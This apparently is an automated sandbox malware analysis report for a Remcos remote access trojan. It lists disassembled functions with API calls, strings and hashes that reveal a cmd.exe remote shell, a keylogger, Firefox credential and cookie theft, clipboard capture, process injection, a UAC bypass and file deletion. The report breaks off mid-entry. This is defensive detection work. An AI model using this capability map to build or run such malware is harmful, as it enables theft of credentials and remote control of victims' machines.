                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    • __Init_thread_footer.LIBCMT ref: 00405723
                                    • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660CC,00000000), ref: 004057B6
                                    • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                    • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                    • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                    • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                      • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                    • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660D0,00000062,004660B4), ref: 004059E4
                                    • Sleep.KERNEL32(00000064,00000062,004660B4), ref: 004059FE
                                    • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                    • CloseHandle.KERNEL32 ref: 00405A23
                                    • CloseHandle.KERNEL32 ref: 00405A2B
                                    • CloseHandle.KERNEL32 ref: 00405A3D
                                    • CloseHandle.KERNEL32 ref: 00405A45
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                    • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                    • API String ID: 2994406822-18413064
                                    • Opcode ID: f51e1e407a3c6e3a44d55a1067086f8f81688e0a34343b3d0a2006916af40dd3
                                    • Instruction ID: feb7c3e087fbbfe745e3798ef664df189eb35a760580a6c3fca7c2e5343dee52
                                    • Opcode Fuzzy Hash: f51e1e407a3c6e3a44d55a1067086f8f81688e0a34343b3d0a2006916af40dd3
                                    • Instruction Fuzzy Hash: 1A91C271604604AFD711FB36ED42A6B369AEB84308F01443FF589A62E2DB7D9C448F6D
                                    Function 00412132 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 238threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentProcessId.KERNEL32 ref: 00412141
                                      • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                      • Part of subcall function 004138B2: RegSetValueExA.ADVAPI32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                      • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                    • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412181
                                    • CloseHandle.KERNEL32(00000000), ref: 00412190
                                    • CreateThread.KERNEL32(00000000,00000000,00412829,00000000,00000000,00000000), ref: 004121E6
                                    • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412455
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                    • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                    • API String ID: 3018269243-13974260
                                    • Opcode ID: 72932527d79eb0b84df19a67bf2cbe60f69183da4d25f0da7fa945edb6755c4f
                                    • Instruction ID: f1b014459f2de55ad39b9ce4e2eab06dd530905b6b6ad57ecd0cf2e75cce6712
                                    • Opcode Fuzzy Hash: 72932527d79eb0b84df19a67bf2cbe60f69183da4d25f0da7fa945edb6755c4f
                                    • Instruction Fuzzy Hash: B971A23160430167C614FB72CD579AE77A4AE94308F40097FF586A21E2FFBC9A49C69E
                                    Function 0040BB6B Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBEA
                                    • FindClose.KERNEL32(00000000), ref: 0040BC04
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 0040BD27
                                    • FindClose.KERNEL32(00000000), ref: 0040BD4D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$CloseFile$FirstNext
                                    • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                    • API String ID: 1164774033-3681987949
                                    • Opcode ID: b41a8e288d6c781c84b11b836a0024b7a118f79960b3641b573c725179fdc384
                                    • Instruction ID: 8b0b2ff803da1d4b435a108118727fe7c74031c8ac088da8990f7d135a86af9b
                                    • Opcode Fuzzy Hash: b41a8e288d6c781c84b11b836a0024b7a118f79960b3641b573c725179fdc384
                                    • Instruction Fuzzy Hash: C7514F3190021A9ADB14FBB2DC56AEEB739AF10304F50057FF506721E2FF785A49CA99
                                    Function 004168FC Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80clipboardmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenClipboard.USER32 ref: 004168FD
                                    • EmptyClipboard.USER32 ref: 0041690B
                                    • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041692B
                                    • GlobalLock.KERNEL32(00000000), ref: 00416934
                                    • GlobalUnlock.KERNEL32(00000000), ref: 0041696A
                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00416973
                                    • CloseClipboard.USER32 ref: 00416990
                                    • OpenClipboard.USER32 ref: 00416997
                                    • GetClipboardData.USER32(0000000D), ref: 004169A7
                                    • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                    • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                    • CloseClipboard.USER32 ref: 004169BF
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                    • String ID: !D@
                                    • API String ID: 3520204547-604454484
                                    • Opcode ID: 22014e37a0533ad6d5301b9a6db5ea665297cd973015afcf0188733ddc164352
                                    • Instruction ID: 548dc4d81477911aad8e8b192ef25fd2d65b79b2884d290c2f7190e4363fe536
                                    • Opcode Fuzzy Hash: 22014e37a0533ad6d5301b9a6db5ea665297cd973015afcf0188733ddc164352
                                    • Instruction Fuzzy Hash: 23215171204301EBD714BB71DC5DAAE7AA9AF88746F00043EF946961E2EF3C8C45866A
                                    Function 0040BD72 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDEA
                                    • FindClose.KERNEL32(00000000), ref: 0040BE04
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 0040BEC4
                                    • FindClose.KERNEL32(00000000), ref: 0040BEEA
                                    • FindClose.KERNEL32(00000000), ref: 0040BF0B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$Close$File$FirstNext
                                    • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                    • API String ID: 3527384056-432212279
                                    • Opcode ID: 957e4b9f77f0127c971f2cbaa54e22c6f4c97dcdb1298e2b7e9e5f591e6deb8c
                                    • Instruction ID: 490896facf616f27299b965c2ba25c256be2621490ca3b25f990f1d956524bcc
                                    • Opcode Fuzzy Hash: 957e4b9f77f0127c971f2cbaa54e22c6f4c97dcdb1298e2b7e9e5f591e6deb8c
                                    • Instruction Fuzzy Hash: E0417F3190021AAACB04F7B2DC5A9EE7769AF11704F50057FF506B21E2EF385A458A9D
                                    Function 0041A045 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 176sleeptimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 0041A04A
                                    • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 0041A07C
                                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A108
                                    • Sleep.KERNEL32(000003E8), ref: 0041A18E
                                    • GetLocalTime.KERNEL32(?), ref: 0041A196
                                    • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A285
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                    • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                    • API String ID: 489098229-1431523004
                                    • Opcode ID: 2b4183d8bba473354f186d6fd22040c2ea42666b5de8bb998ac3c21ef9cf795b
                                    • Instruction ID: 12d64888f2a2aa40a87de1a625a26b3edd7a2139bf4817292c9f8cf1352d8a2d
                                    • Opcode Fuzzy Hash: 2b4183d8bba473354f186d6fd22040c2ea42666b5de8bb998ac3c21ef9cf795b
                                    • Instruction Fuzzy Hash: 7A517D70A002159ACB14BBB5C8529FD77A9AF54308F40407FF509AB1E2EF7C9D85C799
                                    Function 0040F4AF Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 210processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F4C9
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00475338), ref: 0040F4F4
                                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
                                    • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F59E
                                      • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                      • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                    • CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F6A9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                    • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                    • API String ID: 3756808967-1743721670
                                    • Opcode ID: 7e174afa80332a6d9799d90a5ef8f927f9e1300862e9f2cc4ca1dfb4d5584e6a
                                    • Instruction ID: 73d50abc618c2a3d6a57d9d5b79267519347fdb4c989691d2635b3abfd1995a7
                                    • Opcode Fuzzy Hash: 7e174afa80332a6d9799d90a5ef8f927f9e1300862e9f2cc4ca1dfb4d5584e6a
                                    • Instruction Fuzzy Hash: B5712E705083419AC724FB21D8959AEB7E4AF90348F40483FF586631E3EF79994DCB9A
                                    Function 00419662 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 206COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 0$1$2$3$4$5$6$7$VG
                                    • API String ID: 0-1861860590
                                    • Opcode ID: 23e062be4493d8f612a0f73d7cec249050aa78cf65a3b1cbc455386ce95aeb4f
                                    • Instruction ID: 7133b754bba813e7b371628f59950815dc208a5c28e1558ec9b3f3725e93ffbd
                                    • Opcode Fuzzy Hash: 23e062be4493d8f612a0f73d7cec249050aa78cf65a3b1cbc455386ce95aeb4f
                                    • Instruction Fuzzy Hash: 9171E2709183019FD704EF21D862BAB7B94DF85710F00492FF5A26B2D1DE78AB49CB96
                                    Function 00407538 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 56COMMON
                                    Download Yara Rule
                                    APIs
                                    • _wcslen.LIBCMT ref: 0040755C
                                    • CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Object_wcslen
                                    • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                    • API String ID: 240030777-3166923314
                                    • Opcode ID: ee0c587a1dfa56a4776c25ed63fc93c62e7d4b1650b4331978f6b80fa64f11fb
                                    • Instruction ID: 28daeeabb8f9d0779e909056d36d27ae9c6096be3406941992b1a3e854751cf1
                                    • Opcode Fuzzy Hash: ee0c587a1dfa56a4776c25ed63fc93c62e7d4b1650b4331978f6b80fa64f11fb
                                    • Instruction Fuzzy Hash: 88113771D04214B6D710EA959845BDEB77C9B08714F15006FF904B2281EB7CAE448A6F
                                    Function 0041A7D9 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A7EF
                                    • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A83E
                                    • GetLastError.KERNEL32 ref: 0041A84C
                                    • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A884
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                    • String ID:
                                    • API String ID: 3587775597-0
                                    • Opcode ID: b4f2e3a96ffad31793e55c3957a9d7d505f7fea0f7d1b1d8364ea5c68624dc3d
                                    • Instruction ID: 52116c85fb856a5ac6c14b0259405ec20ae2fa8d9cc538ef9907a440d1633313
                                    • Opcode Fuzzy Hash: b4f2e3a96ffad31793e55c3957a9d7d505f7fea0f7d1b1d8364ea5c68624dc3d
                                    • Instruction Fuzzy Hash: 17817071104301ABC304EF61D885DAFB7A8FF94749F50082EF185521A2EF78EE49CB9A
                                    Function 00452690 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 188COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                      • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                      • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                      • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                      • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                      • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448301
                                    • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045279C
                                    • IsValidCodePage.KERNEL32(00000000), ref: 004527F7
                                    • IsValidLocale.KERNEL32(?,00000001), ref: 00452806
                                    • GetLocaleInfoW.KERNEL32(?,00001001,JD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045284E
                                    • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 0045286D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                    • String ID: JD$JD$JD
                                    • API String ID: 745075371-3517165026
                                    • Opcode ID: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                    • Instruction ID: 3c84011e7dbdf7a6f9673bc5a23f9f2f22d5020eb6794df094384b3d0215d6fb
                                    • Opcode Fuzzy Hash: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                    • Instruction Fuzzy Hash: 9B518571900205ABDB10DFA5CD45ABF77B8EF0A702F04046BED14E7292E7B89948CB69
                                    Function 0040C388 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C3D6
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0040C4A9
                                    • FindClose.KERNEL32(00000000), ref: 0040C4B8
                                    • FindClose.KERNEL32(00000000), ref: 0040C4E3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$CloseFile$FirstNext
                                    • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                    • API String ID: 1164774033-405221262
                                    • Opcode ID: 4169ffd3f28e2297937e5de7748edea37615030425ded00ed2c5c169ca4bc7f2
                                    • Instruction ID: 33618048715e6b2d4a7b39963b1e19558724686ef99070a322097c87c0ca4c0c
                                    • Opcode Fuzzy Hash: 4169ffd3f28e2297937e5de7748edea37615030425ded00ed2c5c169ca4bc7f2
                                    • Instruction Fuzzy Hash: 59313E31500219AACB14E761DC9A9EE7778AF50719F10057FF106B21E2EF7C9946CA4D
                                    Function 0041C322 Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C37D
                                    • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C3AD
                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00474EE0,?), ref: 0041C41F
                                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C42C
                                      • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C402
                                    • GetLastError.KERNEL32(?,?,?,?,?,00474EE0,?), ref: 0041C44D
                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C463
                                    • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C46A
                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C473
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                    • String ID:
                                    • API String ID: 2341273852-0
                                    • Opcode ID: 62a2abd498f26ce669d7ffff052401bb4e8331d26592ec8f44b35c1b9ec2a307
                                    • Instruction ID: 53b23dfad01ba0d5beec27b7c27070a1caf437d6ccbc5233b8522822963bc02e
                                    • Opcode Fuzzy Hash: 62a2abd498f26ce669d7ffff052401bb4e8331d26592ec8f44b35c1b9ec2a307
                                    • Instruction Fuzzy Hash: 4A31807284431CAADB24E761DC89EEB736CAF09305F0405FBF559D2051EB3DDAC98A58
                                    Function 00419B86 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 245fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstFileW.KERNEL32(00000000,?), ref: 00419DDC
                                    • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419EA8
                                      • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Find$CreateFirstNext
                                    • String ID: 8SG$PXG$PXG$NG$PG
                                    • API String ID: 341183262-3812160132
                                    • Opcode ID: cd9425940f8db8ef2b08a2b33307d693326731427aae5be40ce922e7e20f00f0
                                    • Instruction ID: 0eaaaed992bec346a468a6d62c1d6888972f0568f5be94e2eef244f320132bd5
                                    • Opcode Fuzzy Hash: cd9425940f8db8ef2b08a2b33307d693326731427aae5be40ce922e7e20f00f0
                                    • Instruction Fuzzy Hash: 998151315083415BC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                    Function 0040A2F3 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
                                    • SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
                                    • GetLastError.KERNEL32 ref: 0040A328
                                      • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A376
                                    • TranslateMessage.USER32(?), ref: 0040A385
                                    • DispatchMessageA.USER32(?), ref: 0040A390
                                    Strings
                                    • Keylogger initialization failure: error , xrefs: 0040A33C
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                    • String ID: Keylogger initialization failure: error
                                    • API String ID: 3219506041-952744263
                                    • Opcode ID: d8c8387710f3476d83fdaf4ec3d7d354e2c1b68a13aa6285ca24eae745b098e4
                                    • Instruction ID: 8743f2250fb8cae6a99ae5fb3d4b34fe2baf279f6720e4878f05ffc9670b3ffc
                                    • Opcode Fuzzy Hash: d8c8387710f3476d83fdaf4ec3d7d354e2c1b68a13aa6285ca24eae745b098e4
                                    • Instruction Fuzzy Hash: 6011BF31510301EBC710BB769D0986B77ACEA95715B20097EFC82E22D1EB34C910CBAA
                                    Function 0040A41B Relevance: 12.1, APIs: 8, Instructions: 112keyboardthreadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetForegroundWindow.USER32 ref: 0040A451
                                    • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                    • GetKeyboardLayout.USER32(00000000), ref: 0040A464
                                    • GetKeyState.USER32(00000010), ref: 0040A46E
                                    • GetKeyboardState.USER32(?), ref: 0040A479
                                    • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A49C
                                    • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
                                    • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A535
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                    • String ID:
                                    • API String ID: 1888522110-0
                                    • Opcode ID: 6b13a39d4d7102bd722f9bbc25ae7d3563ebcd6996124b6635e543b06ec7d5c4
                                    • Instruction ID: fd17a64e9e4f7f825196359ceba3421c6f582a70c0a4c9d277f8a97da3dc7bda
                                    • Opcode Fuzzy Hash: 6b13a39d4d7102bd722f9bbc25ae7d3563ebcd6996124b6635e543b06ec7d5c4
                                    • Instruction Fuzzy Hash: 1E316D72504308BFD700DF90DC45F9B7BECBB88744F00083AB645D61A0D7B5E9498BA6
                                    Function 00414005 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 382registrylibraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140D8
                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140E4
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004142A5
                                    • GetProcAddress.KERNEL32(00000000), ref: 004142AC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressCloseCreateLibraryLoadProcsend
                                    • String ID: SHDeleteKeyW$Shlwapi.dll
                                    • API String ID: 2127411465-314212984
                                    • Opcode ID: 79fdb5d939c4fda9ab65d5331e207ccd9125177c2b07759bb8af03fe36f6d8de
                                    • Instruction ID: 51cedef5a77654bf04fe1bae55708f30d4330cefe0c145b830acf249c6506b6e
                                    • Opcode Fuzzy Hash: 79fdb5d939c4fda9ab65d5331e207ccd9125177c2b07759bb8af03fe36f6d8de
                                    • Instruction Fuzzy Hash: 16B1F671A0430066CA14FB76DC579AF36A85F91788F40053FB906771E2EE7D8A48C6DA
                                    Function 00449210 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 00449292
                                    • _free.LIBCMT ref: 004492B6
                                    • _free.LIBCMT ref: 0044943D
                                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                    • _free.LIBCMT ref: 00449609
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                    • String ID:
                                    • API String ID: 314583886-0
                                    • Opcode ID: 99b9f95825b3d3947f98974b62c5657870841952fc290d3d865075dfb712b2e8
                                    • Instruction ID: 020e1479f4dc59d8c1013f8997fe2690be381d41ecad25fd3e4808fcef6bdafa
